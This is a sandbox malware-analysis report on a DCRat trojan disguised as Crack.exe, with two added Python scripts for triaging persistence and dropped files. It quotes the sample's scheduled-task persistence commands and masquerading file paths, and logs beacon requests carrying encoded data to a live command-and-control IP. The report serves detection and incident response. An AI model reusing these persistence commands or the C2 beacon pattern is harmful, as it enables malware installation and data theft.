File name: | Crack.exe |
Full analysis: | https://app.any.run/tasks/03ee7134-0e06-4214-a391-edace4111234 |
Verdict: | Malicious activity |
Threats: | DCRat, also known as Dark Crystal RAT, is a remote access trojan (RAT) first seen in 2018. It is modular and is customised per build: it can steal passwords and crypto-wallet data, hijack Telegram and Steam accounts, and more. It is distributed in a variety of ways, phishing e-mail being the most common; this sample's file name, Crack.exe, is consistent with a cracked-software lure instead. |
Analysis date: | April 01, 2023, 12:36:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | F8B29AC8C789DFB6648B12FC5D7864A1 |
SHA1: | BE8788B70CE54C592BFD47F29F962A655F953081 |
SHA256: | D9F58E101D377205A0EB569403B16572D30E78C54ACA01A2473F1F0FCDE9FC6A |
SSDEEP: | 49152:UbA30K1OMfWcVv6Y6feCfkOqg0yWEwwFywwtwWRifupv5Vp7foapzOkGfWDriGvU:UbcDucAs2l1FywTgWCD7QapzOkLDr5RC |
Extension | Description | Probability (%) |
---|---|---|
.exe | Win32 Executable (generic) | 52.9 |
.exe | Generic Win/DOS Executable | 23.5 |
.exe | DOS Executable Generic | 23.5 |
Field | Value |
---|---|
Subsystem | Windows GUI |
SubsystemVersion | 5.1 |
ImageVersion | - |
OSVersion | 5.1 |
EntryPoint | 0x1ec40 |
UninitializedDataSize | - |
InitializedDataSize | 255488 |
CodeSize | 201216 |
LinkerVersion | 14 |
PEType | PE32 |
ImageFileCharacteristics | Executable, 32-bit |
TimeStamp | 2020:12:01 18:00:55+00:00 |
MachineType | Intel 386 or later, and compatibles |

Field | Value |
---|---|
Architecture | IMAGE_FILE_MACHINE_I386 |
Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date | 01-Dec-2020 18:00:55 |
Detected languages | - |
Debug artifacts | - |

The link timestamp (1 Dec 2020) and linker version 14 are consistent with each other, but a PE timestamp is attacker-controlled and should not be taken as the build date without corroboration.
DOS header | Value |
---|---|
Magic number | MZ |
Bytes on last page of file | 0x0090 |
Pages in file | 0x0003 |
Relocations | 0x0000 |
Size of header (paragraphs) | 0x0004 |
Min extra paragraphs | 0x0000 |
Max extra paragraphs | 0xFFFF |
Initial SS value | 0x0000 |
Initial SP value | 0x00B8 |
Checksum | 0x0000 |
Initial IP value | 0x0000 |
Initial CS value | 0x0000 |
Overlay number | 0x0000 |
OEM identifier | 0x0000 |
OEM information | 0x0000 |
Address of NE header (e_lfanew) | 0x00000118 |

NT header | Value |
---|---|
Signature | PE |
Machine | IMAGE_FILE_MACHINE_I386 |
Number of sections | 6 |
Time date stamp | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table | 0x00000000 |
Number of symbols | 0 |
Size of Optional Header | 0x00E0 |
Characteristics | - |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x0000DFD0 | 0x0000E000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.63675 |
.reloc | 0x00071000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.25329 | 1875 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 5.10026 | 2216 | UNKNOWN | English - United States | RT_ICON |
3 | 5.25868 | 3752 | UNKNOWN | English - United States | RT_ICON |
4 | 5.02609 | 1128 | UNKNOWN | English - United States | RT_ICON |
5 | 5.18109 | 4264 | UNKNOWN | English - United States | RT_ICON |
6 | 5.04307 | 9640 | UNKNOWN | English - United States | RT_ICON |
7 | 3.1586 | 482 | UNKNOWN | English - United States | RT_STRING |
8 | 3.11685 | 460 | UNKNOWN | English - United States | RT_STRING |
9 | 3.11236 | 440 | UNKNOWN | English - United States | RT_STRING |
10 | 2.99727 | 326 | UNKNOWN | English - United States | RT_STRING |
Imports |
---|
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |

Only three libraries are imported statically, and USER32 only through the delay-load table (the .didat section above). A direct import table this small says little about behaviour on its own; the behaviour of this sample is in what it drops and runs (the .vbe, the .bat and PortMonitor.exe listed below).
PID | Command line | Path | Parent process | User | Integrity level | Exit code | Company | Description | Version |
---|---|---|---|---|---|---|---|---|---|
2964 | "C:\Users\admin\AppData\Local\Temp\Crack.exe" | C:\Users\admin\AppData\Local\Temp\Crack.exe | explorer.exe | admin | MEDIUM | 0 | - | - | - |
3220 | "C:\Windows\System32\WScript.exe" "C:\winSaves\pI1ncDRKXOO.vbe" | C:\Windows\System32\wscript.exe | Crack.exe | admin | MEDIUM | 0 | Microsoft Corporation | Microsoft ® Windows Based Script Host | 5.8.7600.16385 |
2912 | C:\Windows\system32\cmd.exe /c ""C:\winSaves\o0f7O9jVQUVK1.bat" " | C:\Windows\System32\cmd.exe | wscript.exe | admin | MEDIUM | 0 | Microsoft Corporation | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3548 | "C:\winSaves\PortMonitor.exe" | C:\winSaves\PortMonitor.exe | cmd.exe | admin | MEDIUM | 0 | - | - | 1.1.1o |
2184 | "C:\Windows\System32\cmd.exe" /c "C:\winSaves\PortMonitor.exe" | C:\Windows\System32\cmd.exe | PortMonitor.exe | admin | HIGH | 0 | Microsoft Corporation | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1204 | C:\winSaves\PortMonitor.exe | C:\winSaves\PortMonitor.exe | cmd.exe | admin | HIGH | 0 | - | - | 1.1.1o |
3072 | schtasks.exe /create /tn "PortMonitorP" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /f | C:\Windows\System32\schtasks.exe | WmiPrvSE.exe | admin | HIGH | 0 | Microsoft Corporation | Manages scheduled tasks | 6.1.7600.16385 (win7_rtm.090713-1255) |
3648 | schtasks.exe /create /tn "PortMonitor" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | WmiPrvSE.exe | admin | HIGH | 0 | Microsoft Corporation | Manages scheduled tasks | 6.1.7600.16385 (win7_rtm.090713-1255) |
3724 | schtasks.exe /create /tn "PortMonitorP" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | WmiPrvSE.exe | admin | HIGH | 0 | Microsoft Corporation | Manages scheduled tasks | 6.1.7600.16385 (win7_rtm.090713-1255) |
3912 | schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\SearchProtocolHost.exe'" /f | C:\Windows\System32\schtasks.exe | WmiPrvSE.exe | admin | HIGH | 0 | Microsoft Corporation | Manages scheduled tasks | 6.1.7600.16385 (win7_rtm.090713-1255) |

Execution chain: Crack.exe (2964) writes a VBE and a BAT into C:\winSaves and runs the VBE through wscript.exe (3220); the script runs the BAT through cmd.exe (2912), which starts PortMonitor.exe (3548). PortMonitor.exe then relaunches itself through cmd.exe (2184); that cmd.exe and its child PortMonitor.exe (1204) run at HIGH integrity although 3548 ran at MEDIUM, so the relaunch passed through a UAC elevation. All four schtasks.exe processes have WmiPrvSE.exe as parent, which is what a process looks like when it is started through WMI (Win32_Process.Create) rather than directly, so the parent/child view does not show which process requested the tasks. Three tasks re-run a payload every 7, 8 or 11 minutes (the 8-minute PortMonitorP replaces the 7-minute one of the same name because of /f) and one runs it at every logon with /rl HIGHEST. PID 2948 (SearchProtocolHost.exe), which generates all of the network traffic below, is not part of this excerpt of the tree. PortMonitor.exe carries no company or description and a version string, 1.1.1o, that follows OpenSSL's release numbering rather than anything describing this file.
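The four schtasks.exe command lines above are the persistence to hunt for. The following is an added example, not part of the ANY.RUN report and not code from the sample: it parses such command lines and scores them. The four events are copied from the process table; the interval threshold, the set of trusted directories and the treatment of a WmiPrvSE.exe parent are the example's own assumptions about what separates a persistence task from a benign one.

```python
"""Score schtasks.exe /create command lines taken from a process tree.

Added example (not the ANY.RUN report's or DCRat's code). The events are
copied from the report; the scoring rules are this example's assumptions.
"""
import re

# Constructed from the report's process table: (pid, parent process, command line).
SCHTASKS_EVENTS = [
    (3072, "WmiPrvSE.exe", r'''schtasks.exe /create /tn "PortMonitorP" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /f'''),
    (3648, "WmiPrvSE.exe", r'''schtasks.exe /create /tn "PortMonitor" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /rl HIGHEST /f'''),
    (3724, "WmiPrvSE.exe", r'''schtasks.exe /create /tn "PortMonitorP" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /rl HIGHEST /f'''),
    (3912, "WmiPrvSE.exe", r'''schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\SearchProtocolHost.exe'" /f'''),
]

# Assumptions used for scoring (not from the report).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MAX_BENIGN_MINUTES = 15   # legitimate software rarely re-launches itself this often
_ALL_USERS = "c:\\users\\all users\\"
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def normalize_path(path):
    """Fold the All Users junction onto C:\\ProgramData (its target on Vista and later),
    so a task target can be matched against the dropped-file paths."""
    if path.lower().startswith(_ALL_USERS):
        return "C:\\ProgramData\\" + path[len(_ALL_USERS):]
    return path


def parse_schtasks_create(cmdline):
    """Return the options of a schtasks /create command line, or None if it is not one."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower().rsplit("\\", 1)[-1] != "schtasks.exe":
        return None
    opts, i = {}, 1
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i][1:].lower()
            has_value = i + 1 < len(toks) and not toks[i + 1].startswith("/")
            opts[key] = toks[i + 1] if has_value else True   # bare switch -> True
            i += 2 if has_value else 1
        else:
            i += 1
    if "create" not in opts:
        return None
    mo = opts.get("mo")
    return {
        "task_name": opts.get("tn"),
        "schedule": str(opts.get("sc", "")).upper(),
        "modifier": int(mo) if isinstance(mo, str) and mo.isdigit() else None,
        "run_level": str(opts["rl"]).upper() if "rl" in opts else None,
        "target": normalize_path(str(opts.get("tr", "")).strip("'\"")),  # strip the '...' wrapper
        "force": "f" in opts,
    }


def suspicious_reasons(task, parent):
    """Why a parsed task looks like malware persistence; an empty list means nothing stood out."""
    reasons = []
    if task["schedule"] == "MINUTE" and task["modifier"] is not None \
            and task["modifier"] <= MAX_BENIGN_MINUTES:
        reasons.append(f"re-runs every {task['modifier']} minutes (watchdog-style persistence)")
    if task["run_level"] == "HIGHEST":
        reasons.append("runs with the highest available privileges (/rl HIGHEST)")
    if task["target"] and not task["target"].lower().startswith(TRUSTED_PREFIXES):
        reasons.append(f"target outside Windows/Program Files: {task['target']}")
    if parent.lower() == "wmiprvse.exe":
        reasons.append("created through WMI (parent is WmiPrvSE.exe), which hides the real requester")
    if task["force"]:
        reasons.append("/f silently replaces an existing task of the same name")
    return reasons


def triage(events):
    """Parsed tasks that raised at least one reason, in input order."""
    findings = []
    for pid, parent, cmdline in events:
        task = parse_schtasks_create(cmdline)
        if task is None:
            continue
        reasons = suspicious_reasons(task, parent)
        if reasons:
            findings.append({"pid": pid, **task, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SCHTASKS_EVENTS):
        print(f"PID {f['pid']}: task {f['task_name']!r} -> {f['target']}")
        for reason in f["reasons"]:
            print("   -", reason)
```

Normalising C:\Users\All Users to C:\ProgramData is what lets the task targets line up with the C:\ProgramData\Microsoft Help\PortMonitor.exe row in the file table further down; without it, a naive path comparison misses that both refer to the same file.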
PID | Process | Key | Operation | Name | Value |
---|---|---|---|---|---|
2964 | Crack.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
2964 | Crack.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
2964 | Crack.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
2964 | Crack.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0 |
3220 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
3220 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
3220 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
3220 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0 |
3548 | PortMonitor.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | write | EnableLUA | 1 |
3548 | PortMonitor.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |

The ZoneMap writes (ProxyBypass, IntranetName, UNCAsIntranet, AutoDetect) are a well-known side effect of initialising the WinINet/urlmon zone settings and show up in most sandbox runs; they show that Crack.exe, wscript.exe and PortMonitor.exe each set up an Internet session, not that proxy settings were tampered with, and are low-signal on their own. The write worth alerting on is PortMonitor.exe setting HKLM\...\Policies\System\EnableLUA: the value 1 leaves UAC enabled, so this is not a UAC bypass, but a dropped executable writing a machine-wide security policy is abnormal in itself.
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2964 | Crack.exe | C:\winSaves\pI1ncDRKXOO.vbe | vbe | 13928DA812816AB56D330EA306D0C6F4 | A05B31459D6740CB413FDF6E721048D1344ADDD9FFC4EC4505844050CD8809D5 |
1204 | PortMonitor.exe | C:\ProgramData\Microsoft Help\PortMonitor.exe | executable | 88D334930C206C730F9B21F68D2580FC | 872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 |
1204 | PortMonitor.exe | C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\e8aa3d0a77e909 | text | EA87CD86F42582EFC8E619C92DD6842D | 3D55EF671807ABFDBAF79C1DD74204A7214AAA3DA0A010BD250679936B3912A5 |
1204 | PortMonitor.exe | C:\Users\Public\Desktop\617403385cfa57 | text | 12FC47E356C270290D42094981E5F315 | 2AD7C184BB38EC50A1F83D6E3374828E229BC91C9EECF8B03DF2891B64AC0A2F |
2964 | Crack.exe | C:\winSaves\o0f7O9jVQUVK1.bat | text | 0F4E1FD6D78321F445CE4D226FB7788E | 726E83139D35E880FC97B473DE9E48E9C4715F0E11518678D5AED648F888382C |
1204 | PortMonitor.exe | C:\ProgramData\Microsoft Help\3493c6ec4133a5 | text | B64A4CD96F85948FF2975F8C9C623A43 | 548AEA2D1DCAF77E7BA01D51FBA61597B5C450D4E26D7268AC320590DCD86551 |
2964 | Crack.exe | C:\winSaves\PortMonitor.exe | executable | 88D334930C206C730F9B21F68D2580FC | 872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 |
1204 | PortMonitor.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\spoolsv.exe | executable | 88D334930C206C730F9B21F68D2580FC | 872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 |
1204 | PortMonitor.exe | C:\Users\Public\Desktop\SearchFilterHost.exe | executable | 88D334930C206C730F9B21F68D2580FC | 872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 |
1204 | PortMonitor.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\f3b6ecef712a24 | text | E10E6EEE63939FAF9981892F9E6908F7 | D8DAD6A84074461D3D08DADD4A620A77C10A3B6AFFB54E30E37EBE3861879409 |

One payload (SHA256 872AE19D...9807652, the PortMonitor.exe first dropped to C:\winSaves) is written to three more places, two of them under names that belong to Windows components: C:\ProgramData\Microsoft Help\PortMonitor.exe (the C:\Users\All Users\Microsoft Help path in the scheduled tasks is the same directory through the All Users junction), C:\Recovery\345b46fe-...\spoolsv.exe and C:\Users\Public\Desktop\SearchFilterHost.exe. Each copy is accompanied by a small text file whose name is 14 hexadecimal characters. The MSOCache directory that task SearchProtocolHostS points to holds such a file (e8aa3d0a77e909), but the SearchProtocolHost.exe the task runs is not in this excerpt of the file list.
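To see that replication pattern at a glance, here is an added example (not the report's and not the sample's code) that groups the rows above by SHA256, flags executables that reuse a Windows binary name outside C:\Windows, and pairs each dropped executable with the 14-hex-character text file written beside it. The rows are copied from the table; the list of Windows binary names, the trusted prefix and the companion-file rule are the example's own assumptions.

```python
"""Group a sandbox file-drop table by hash and flag Windows-binary name reuse.

Added example (not the ANY.RUN report's or DCRat's code). The rows are copied
from the report; WINDOWS_BINARY_NAMES, TRUSTED_PREFIXES and the companion-file
rule are this example's assumptions.
"""
import ntpath
import re
from collections import defaultdict

# Constructed from the report's file table: (pid, process, path, type, sha256).
DROPPED = [
    (2964, "Crack.exe", r"C:\winSaves\pI1ncDRKXOO.vbe", "vbe",
     "A05B31459D6740CB413FDF6E721048D1344ADDD9FFC4EC4505844050CD8809D5"),
    (1204, "PortMonitor.exe", r"C:\ProgramData\Microsoft Help\PortMonitor.exe", "executable",
     "872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652"),
    (1204, "PortMonitor.exe", r"C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\e8aa3d0a77e909", "text",
     "3D55EF671807ABFDBAF79C1DD74204A7214AAA3DA0A010BD250679936B3912A5"),
    (1204, "PortMonitor.exe", r"C:\Users\Public\Desktop\617403385cfa57", "text",
     "2AD7C184BB38EC50A1F83D6E3374828E229BC91C9EECF8B03DF2891B64AC0A2F"),
    (2964, "Crack.exe", r"C:\winSaves\o0f7O9jVQUVK1.bat", "text",
     "726E83139D35E880FC97B473DE9E48E9C4715F0E11518678D5AED648F888382C"),
    (1204, "PortMonitor.exe", r"C:\ProgramData\Microsoft Help\3493c6ec4133a5", "text",
     "548AEA2D1DCAF77E7BA01D51FBA61597B5C450D4E26D7268AC320590DCD86551"),
    (2964, "Crack.exe", r"C:\winSaves\PortMonitor.exe", "executable",
     "872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652"),
    (1204, "PortMonitor.exe", r"C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\spoolsv.exe", "executable",
     "872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652"),
    (1204, "PortMonitor.exe", r"C:\Users\Public\Desktop\SearchFilterHost.exe", "executable",
     "872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652"),
    (1204, "PortMonitor.exe", r"C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\f3b6ecef712a24", "text",
     "D8DAD6A84074461D3D08DADD4A620A77C10A3B6AFFB54E30E37EBE3861879409"),
]

# Assumption: names of real Windows binaries that only belong under C:\Windows.
WINDOWS_BINARY_NAMES = {"spoolsv.exe", "searchfilterhost.exe", "searchprotocolhost.exe",
                        "svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe"}
TRUSTED_PREFIXES = ("c:\\windows\\",)
_COMPANION = re.compile(r"[0-9a-f]{14}")   # 14 lowercase hex chars, no extension


def copies_by_hash(rows):
    """Map each SHA256 to every path it was written to; more than one path means replication."""
    groups = defaultdict(list)
    for _pid, _proc, path, _ftype, sha256 in rows:
        groups[sha256.upper()].append(path)
    return {h: paths for h, paths in groups.items() if len(paths) > 1}


def masquerades(rows):
    """Dropped executables that carry a Windows binary name but live outside C:\\Windows."""
    hits = []
    for _pid, _proc, path, ftype, sha256 in rows:
        name = ntpath.basename(path).lower()
        if (ftype == "executable" and name in WINDOWS_BINARY_NAMES
                and not path.lower().startswith(TRUSTED_PREFIXES)):
            hits.append({"name": name, "path": path, "sha256": sha256})
    return sorted(hits, key=lambda h: h["name"])


def companion_files(rows):
    """Per directory: dropped executables and the 14-hex-character text files beside them.
    A directory with a marker but no executable points at a copy missing from the table."""
    by_dir = defaultdict(lambda: {"exe": [], "marker": []})
    for _pid, _proc, path, ftype, _sha in rows:
        directory, name = ntpath.split(path)
        if ftype == "executable":
            by_dir[directory]["exe"].append(name)
        elif ftype == "text" and _COMPANION.fullmatch(name):
            by_dir[directory]["marker"].append(name)
    return {d: v for d, v in by_dir.items() if v["marker"]}


if __name__ == "__main__":
    for sha256, paths in copies_by_hash(DROPPED).items():
        print(f"{sha256[:12]}... written to {len(paths)} locations:")
        for p in paths:
            print("   ", p)
    for hit in masquerades(DROPPED):
        print(f"masquerade: {hit['name']} at {hit['path']}")
    for directory, v in companion_files(DROPPED).items():
        print(f"{directory}: exe={v['exe'] or 'NOT IN TABLE'} marker={v['marker']}")
```

ntpath is used deliberately so the path handling is Windows-correct even when the script runs on a Linux analysis host.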
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2948 | SearchProtocolHost.exe | GET | — | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&cdcb8a5f0961cc7a07b5ac3d675f9811=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnBTRVdWTU1kNjpXT2UERJpXSE1Ue4MVT2FleXJiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiI5UGZ3EjY1MmMmljNzEGZ4IzY0QjZiN2NmRDM5UGOkBDOkFzY0kDNiJiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | — | — | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?B7WkvJxoCjhkr2VmyI9UhH21wKHer=vMSvVYlDKw8&Q5gRFbxRd0fQX3FexkBS7=yUR6h6Au7NV216VeFqrZ04r&bcc31a2d967b731818da98c237e4d99f=8718086f666781861db7ec0ee0e18bc3&cec6b04b0668728de3a6b2a93639588c=QZmNmNzETY3QWZ1IDOyYmYxkjNjVDO1IGOyAzNxczMjFWNjFmYjJmM&B7WkvJxoCjhkr2VmyI9UhH21wKHer=vMSvVYlDKw8&Q5gRFbxRd0fQX3FexkBS7=yUR6h6Au7NV216VeFqrZ04r | NL | text | 2.05 Kb | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiImJGMkljMzgzMyEzY2gDNzYWMyIzN3QzM4gDZ4EzMkhzMmZWO5YjM1IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nIhF2NjJWN2kjZjRGOjRTM1E2YyQGOiVWYldzNmRmY5YTNmFTOwQTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nIyMjMkFWZ5QGOzkTZlRjYzMWZ4cjZ2MWMmFTO5Y2YmNjMyQjZ0UGMwIiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
